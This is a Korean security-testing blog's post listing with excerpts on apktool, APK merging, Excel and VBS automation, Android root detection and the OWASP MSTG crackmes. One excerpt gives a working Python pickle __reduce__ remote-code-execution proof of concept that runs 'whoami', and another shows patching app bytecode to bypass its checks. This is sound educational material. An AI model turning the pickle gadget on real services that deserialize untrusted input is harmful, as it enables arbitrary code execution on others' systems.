목록전체 글 (370)
cgy12306
취약점 점검 엑셀 보고서 정리 중 필터처리 된 엑셀 표를 필터처리 된 곳에 붙여넣기 할 일이 많은데, 그대로 복사, 붙여넣기 수행을 하게 되면 필터가 안된곳에 붙여넣기가 되는 문제가 있었습니다. 다른 블로그들의 글을 보니 보이는 셀만 선택해서 복붙하면 된다는 글이 있었지만 저는 제대로 되지 않아서 글을 써봅니다. 위의 sheet1의 표와 sheet2가 준비되어 있습니다. 영어 A로 되어 있는 값을 C로 바꾸는 작업을 하겠습니다. 영어 컬럼을 A라는 값으로 필터를 해줍니다. sheet2도 마찬가지로 A를 C로 바꿔야 하기 때문에 C로 필터하겠습니다. 다시 sheet1로 돌아가서 A로 필터된 표에서 맨위의셀 하나를 클릭하여 "="을 입력하고 sheet2의 C로 필터된 맨 위의 셀을 선택해줍니다. 여기서 아래..
'/data/app/앱' 경로에 ADB를 통해 앱을 받아보면 받아보면 split된 APK를 확인할 수 있습니다. base.apk만 jadx나 JEB로 열어보면 클래스가 덜 나와있는걸 볼 수 있습니다. 해당 apk들을 합쳐야만 정상적으로 모든 내용을 볼 수 있습니다. apk를 병합하는 방법은 아래와 같습니다. 1. 분할된 APK 파일들을 apktool로 디컴파일(2.6.1) java -jar apktool.jar d base.apk java -jar apktool.jar d split_config.arm64_v8a.apk java -jar apktool.jar d split_config.ko.apk java -jar apktool.jar d split_config.xxhdpi.apk 2. split_con..
파이썬 pickle 모듈에서 loads를 수행 시 __reduce__ 메소드를 통해 deserialize 할때 발생하는 RCE 취약점 import pickle import os class exploit(): def __reduce__(self): return (os.system,("whoami", )) pd = pickle.dumps(exploit()) pl = pickle.loads(pd) print(pl) __reduce__ 메소드는 튜플을 반환 whoami 명령 수행 확인 pickletools를 통해 pickle 데이터를 분석할 수 있음 import pickle import os import pickletools class exploit(): def __reduce__(self): return (o..
하위 디렉토리 내를 재귀 돌면서 특정 소스코드의 라인 수를 계산해주는 배치 스크립트 6번째 라인에서 원하는 확장자를 추가나 삭제하면 됨 @echo off setlocal enabledelayedexpansion set /a linecnt=0 for /r %%i in (*.java *.html) do ( for /f "tokens=3 usebackq" %%a IN (`Find /V /C %%i ""`) do set /a res=%%a set /a linecnt+=!res! ) echo %linecnt%
Decompile apktool d [apk 파일] ※ 난독화가 되어 있으면 에러가 발생할 수 있습니다. -r 옵션으로 리소스 디컴파일링 무시합니다. decompile을 하면 apk파일명으로 폴더가 하나 생성됩니다. 디컴파일과 리컴파일을 테스트 하기 위해 FridaLab을 이용합니다. CHECK 버튼을 누르면 모두 붉은색으로 뜨게 됩니다. 코드패치할 부분을 찾습니다. completeArr은 미션을 수행했는지 확인하는 배열입니다. 1로 체크되면 미션이 수행된것으로 판단하여 붉은색을 녹색으로 변환해줍니다. 해당 파일을 vscode로 열어 0x0값을 0x1로 변경해줍니다. Recomile apktool b [수정한 코드가 담긴 폴더] -o [생성할 apk 파일명] 리컴파일이 완료되면 apk가 새로 생성된것을 ..
설치 경로 : https://ibotpeaches.github.io/Apktool/install/ wrapper script 우클릭하여 다른이름으로 링크 저장을 통해 apktool.bat으로 저장 find newest here에서 최신 버전의 jar 파일 설치 2에서 설치받은 파일을 apktool.jar 로 이름 변경 apktool.jar와 apktool.bat 파일을 c://windows로 이동 apktool 실행 확인
회사에서 엑셀을 자동화하기 위해서 VBS로 툴을 만들었었다... 이걸 하게 될줄은 몰랐지만.. 까먹기전에 저장... Visual Basic Script 엑셀 파일 열기 및 저장 set args = wscript.arguments '인자 설정 set xl = createobject("Excel.Application") '엑셀 객체 생성 set wb = xl.Workbooks.open(파일) '엑셀 파일 오픈 wb.save wb.close xl.quit cell 값 가져오기 및 쓰기 wscript.echo wb.sheets(시트번호).cells(행, 열) 'sheet 값 가져와서 출력 wb.sheets(시트번호).cells(행, 열) = "AAA" cell 열 너비 지정 wb.sheets(시트번호).Colu..
왜 루팅 탐지를 하는지? 스마트폰이 루팅 탐지되면 사용자의 연락처, email 또는 다른 기밀 데이터에 접근할 수 있게 됩니다. 또한 권한 상승을 할 수 있게 되며, 보호 기법들을 우회하여 다른 앱들의 기밀 데이터에 접근할 수 있게 됩니다. 루팅 탐지 빌드 방법 탐지 Test-Keys는 서드 파티 개발자로부터 생성된 서명된 커스텀 키입니다. ansdroid.os.Build.TAGS 속성에 접근하여 test-keys를 확인합니다. private boolean detectTestKeys() { String buildTags = android.os.Build.TAGS; return buildTags != null && buildTags.contains("test-keys"); } su 바이너리 확인 su 바이..
파일 다운로드 경로 : https://github.com/OWASP/owasp-mstg/tree/master/Crackmes/Android/Level_01 GitHub - OWASP/owasp-mstg: The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing an The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing and reverse engineering. It describes the technical processes for verifying the con..
Nox Nox player 설치 https://github.com/OWASP/owasp-mstg 에서 파일들 다운로드 어플리케이션 취약점을 진단하기 위해 녹스 플레이어에서 ROOT를 켜줍니다. 설정저장 후 재부팅 해줍니다. dex2jar, jd-gui 안드로이드에서 사용하는 apk 파일은 파일들을 모아놓은 압축(패키지) 파일입니다. apk 파일을 zip 뷰어로 확인해보면 다양한 파일들을 볼 수 있습니다. META-INF : 암호화 서명 등의 설정 정보가 포함되어 있는 디렉토리입니다. res : 어플리케이션 측에서 레이아웃, 이미지 등을 사용하기 위해 저장되는 디렉토리입니다. AndroidManifest.xml : 안드로이드 빌드 도구, 안드로이드 운영체제 및 앱에 관한 필수 정보를 담고있는 파일입니다. ..